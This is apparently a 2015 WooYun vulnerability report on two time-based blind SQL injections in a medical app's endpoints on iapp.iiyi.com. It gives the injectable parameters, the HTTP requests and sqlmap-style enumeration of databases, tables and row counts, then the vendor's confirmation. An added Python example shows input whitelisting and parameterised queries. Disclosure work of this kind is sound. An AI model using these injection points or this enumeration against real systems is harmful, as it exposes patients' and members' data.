
Vulnerability summary

Defect ID: wooyun-2015-0148535

Title: Two time-based blind SQL injections on a 快速问医生 site

Vendor: 快速问医生

Author: Hancock

Submitted: 2015-10-22 09:56

Fixed: 2015-12-10 09:14

Published: 2015-12-10 09:14

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-22: Details sent to the vendor, awaiting vendor handling
2015-10-26: Vendor confirmed; details disclosed to the vendor only
2015-11-05: Details disclosed to core white hats and experts in the relevant field
2015-11-15: Details disclosed to regular white hats
2015-11-25: Details disclosed to intern white hats
2015-12-10: Details disclosed to the public

Brief description:

Two time-based blind SQL injections on a 快速问医生 site

Details:

1. Parameter: uid

GET /zlzs/v6/other/chknum/?maxid=46670&version=62&tsid=0&uid=511340&signature=316fb0a67cacb068&os=2&uuid=862620029971316&type=today_case_update&channel=iiyi HTTP/1.1
Host: iapp.iiyi.com
Connection: Keep-Alive
Accept-Encoding: gzip


available databases [3]:
[*] information_schema
[*] test
[*] zhiye
current user: 'zhiye@%'


Database: zhiye
[51 tables]
+---------------------------+
| beitai_jkk |
| beitai_jkk_info |
| limit_class |
| log_login |
| url_120net |
| zhiye_admin_comment |
| zhiye_beitai_doc |
| zhiye_buy_path |
| zhiye_check_doctor_order |
| zhiye_click |
| zhiye_consults |
| zhiye_consults_copy |
| zhiye_dept |
| zhiye_dept_disease |
| zhiye_dept_disease_copy |
| zhiye_disease |
| zhiye_doctor_complain |
| zhiye_doctor_tags |
| zhiye_doctor_task_lv |
| zhiye_doctors |
| zhiye_doctors_certificate |
| zhiye_doctors_check |
| zhiye_doctors_copy |
| zhiye_doctors_interview |
| zhiye_doctors_msg |
| zhiye_doctors_picture |
| zhiye_doctors_remark |
| zhiye_doctors_replycount |
| zhiye_doctors_reward |
| zhiye_doctors_search |
| zhiye_doctors_symptom |
| zhiye_doctors_welcome |
| zhiye_domains |
| zhiye_drawings |
| zhiye_gratuitous |
| zhiye_hezuo_user |
| zhiye_notices |
| zhiye_order_mobile |
| zhiye_order_record |
| zhiye_orders |
| zhiye_orders_copy |
| zhiye_orders_ext |
| zhiye_orders_notes |
| zhiye_pay_card |
| zhiye_pay_feedback |
| zhiye_pay_order |
| zhiye_receive_msg |
| zhiye_relation |
| zhiye_replycount_mark |
| zhiye_safes |
| zhiye_thanks |
+---------------------------+


2. Parameters: fid, uid (note: same site as above, but a different database)

POST /zlzs/v6/applica/literaturelist HTTP/1.1
Content-Length: 149
Content-Type: application/x-www-form-urlencoded
Host: iapp.iiyi.com
Connection: Keep-Alive
Accept-Encoding: gzip
fid=1&version=62&uid=5113407&signature=316fb0a60d81351b&os=2&uuid=862620029971316&page=1&limit=10&channel=iiyi


available databases [3]:
[*] iiyicenter
[*] information_schema
[*] test
current user: 'iiyicenter@%'


I don't know Python, so running into a time-based injection is exhausting.

COUNT(*)
Database: iiyicenter
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| app_access_detail_old | 28473447 |
| dynamic_friends_0 | 20974637 |
| dynamic_aboutme_0 | 20970694 |
| dynamic_aboutme_9 | 20167989 |
| dynamic_friends_9 | 20160679 |
| dynamic_aboutme_8 | 19348024 |
| dynamic_friends_8 | 19341490 |
| dynamic_aboutme_6 | 19289556 |
| dynamic_friends_6 | 19282284 |
| dynamic_aboutme_4 | 19020399 |
| dynamic_friends_4 | 19012517 |
| dynamic_aboutme_7 | 18947158 |
| dynamic_friends_7 | 18940588 |
| dynamic_aboutme_1 | 18379309 |
| dynamic_aboutme_2 | 17805447 |
| dynamic_friends_2 | 17797747 |
| dynamic_aboutme_5 | 17711265 |
| dynamic_friends_5 | 17703381 |
| dynamic_aboutme_3 | 17270894 |
| dynamic_friends_3 | 17262676 |
| dynamic_friends_1 | 17191450 |
| app_access_detail | 13410757 |
| applica_downdetial | 7344028 |
| dynamic_autoid | 5641553 |
| dynamic_square | 5390616 |
| dynamic_0 | 4529266 |
| member_perfection | 2629138 |
| member_beans_detial | 2075829 |
| member_signin_detail | 2046058 |
| member_relation | 1476128 |
| applica_perdownload | 1416018 |
| member_base | 1215447 |
| home_access | 894350 |
| disease_tags_posts | 568732 |
| pms_detail | 469387 |
| disease_tags_sous | 451900 |
| pms_relation | 447857 |
| case_comment | 318711 |
| app_access_uuid | 303506 |
| sysnotice | 184563 |
| drug_to_action | 117059 |
| member_bbs_signin | 109220 |
| member_beans_tran_log | 109042 |
| disease_tags_bingli | 100580 |
| disease_tags_collection | 100002 |
| disease_tags_question | 99699 |
| drug_comp | 88940 |
| posts | 76745 |
| disease_tags_news | 60255 |
| euids | 50682 |
| case_myreply | 50157 |
| `case` | 42706 |
| topic_comment | 33942 |
| disease_tags_case | 33914 |
| member_image | 31925 |
| topic_myreply | 30516 |
| member_certification | 27869 |
| base_hospital | 26701 |
| case_images | 25237 |
| thread_support | 23019 |
| sysnotice_mine_6 | 21972 |
| case_icons | 21084 |
| sysnotice_mine_0 | 20102 |
| sysnotice_mine_5 | 19979 |
| case_collection | 19960 |
| sysnotice_mine_9 | 18610 |
| sysnotice_mine_1 | 18547 |
| sysnotice_mine_4 | 17783 |
| sysnotice_mine_2 | 17278 |
| sysnotice_mine_7 | 17156 |
| sysnotice_mine_3 | 16981 |
| sysnotice_mine_8 | 15971 |
| threads | 15268 |
| applica_content | 12579 |
| dynamic_tiny | 10000 |
| dynamic_mine_0 | 8741 |
| drug_action | 8527 |
| dynamic_mine_3 | 8357 |
| dynamic_mine_5 | 8191 |
| dynamic_mine_4 | 8102 |
| dynamic_mine_2 | 7934 |
| dynamic_mine_1 | 7690 |
| dynamic_mine_9 | 7496 |
| dynamic_mine_6 | 7401 |
| dynamic_mine_7 | 6745 |
| dynamic_mine_8 | 6668 |
| member_invitecode | 6582 |
| topic_comment_support | 5606 |
| topic_collection | 4617 |
| disease_tags_look | 3556 |
| topic | 3336 |
| base_area | 3230 |
| hotmed | 3058 |
| case_comment_support | 2929 |
| tupu_images | 2434 |
| disease_tags_guide | 2415 |
| feedback | 2379 |
| flash | 1948 |
| guide_collection | 1812 |
| topic_images | 1410 |
| disease_tags | 1245 |
| guide | 1187 |
| flash_collection | 1079 |
| dynamic_comment_0 | 1040 |
| beans_order | 1016 |
| app_counts | 973 |
| literature | 921 |
| tupu_class | 803 |
| tupu_class_copy | 803 |
| advertise_static | 772 |
| tupu_copy | 762 |
| tupu | 760 |
| applica_sort | 740 |
| member_certification_ask | 688 |
| member_invite_mobile | 535 |
| it_topic | 454 |
| app_coupon | 371 |
| it_images | 306 |
| it_comment | 234 |
| member_groups | 196 |
| flash_comment | 161 |
| flash_images | 119 |
| disease_tags_topic | 110 |
| dayly_news | 94 |
| app_login_faild | 48 |
| app_dbversion | 47 |
| flash_comment_support | 45 |
| band_records | 29 |
| disease_tags_types | 28 |
| case_noallow | 24 |
| literature_sort | 21 |
| flash_sort | 12 |
| applica_dbversion | 10 |
| company | 9 |
| case_admin | 7 |
| site_var | 6 |
| tupu_class_type | 5 |
| advertise | 3 |
| app_activety | 2 |
| member_black | 2 |
| case_icons_log | 1 |
+--------------------------+---------+

Proof of vulnerability:

Fix recommendation:

Just delete it.

Copyright: please credit the source when reposting. Hancock@乌云
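The report's remediation advice is to remove the endpoints. As an added example that is not from the report or the vendor, this is the kind of parameter whitelist and parameterised lookup that would close both injections if the endpoints have to stay: the endpoint paths and parameter names come from the two requests above, while the table name, the SQL statement and the sample rows are assumptions.

```python
# Added example, not code from the WooYun report or the vendor: whitelist
# validation for the two iapp.iiyi.com endpoints named in the report, with
# the lookup done as a parameterised query.  Table and SQL are assumptions.
import re
import sqlite3
from urllib.parse import parse_qs

INT, HEX16, WORD = (re.compile(r"^[0-9]{1,15}$"), re.compile(r"^[0-9a-f]{16}$"),
                    re.compile(r"^[A-Za-z0-9_]{1,32}$"))
# Parameter shapes taken from the requests in the report.
SCHEMAS = {
    "/zlzs/v6/other/chknum/": dict(maxid=INT, version=INT, tsid=INT, uid=INT,
        signature=HEX16, os=INT, uuid=INT, type=WORD, channel=WORD),
    "/zlzs/v6/applica/literaturelist": dict(fid=INT, version=INT, uid=INT,
        signature=HEX16, os=INT, uuid=INT, page=INT, limit=INT, channel=WORD),
}

def validate(path, query):
    """Return validated params as strings, or None on any mismatch."""
    schema = SCHEMAS.get(path)
    if schema is None:
        return None
    params = parse_qs(query, keep_blank_values=True)
    if set(params) != set(schema):            # missing or unexpected params
        return None
    if any(len(v) != 1 or not schema[k].match(v[0]) for k, v in params.items()):
        return None                            # e.g. a uid carrying SQL syntax
    return {k: v[0] for k, v in params.items()}

def count_updates(conn, query):
    """Hardened chknum lookup: uid/maxid bound as integers, never spliced in."""
    params = validate("/zlzs/v6/other/chknum/", query)
    if params is None:
        return None
    row = conn.execute("SELECT COUNT(*) FROM case_update WHERE uid=? AND id>?",
                       (int(params["uid"]), int(params["maxid"]))).fetchone()
    return row[0]

def demo_db():
    """Constructed in-memory table standing in for the real one (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE case_update (id INTEGER, uid INTEGER)")
    conn.executemany("INSERT INTO case_update VALUES (?, ?)",
                     [(46669, 511340), (46671, 511340), (46672, 511340), (46673, 7)])
    return conn
```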


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-10-26 09:13

Vendor reply:

Vulnerability confirmed, thanks!

Latest status:

None

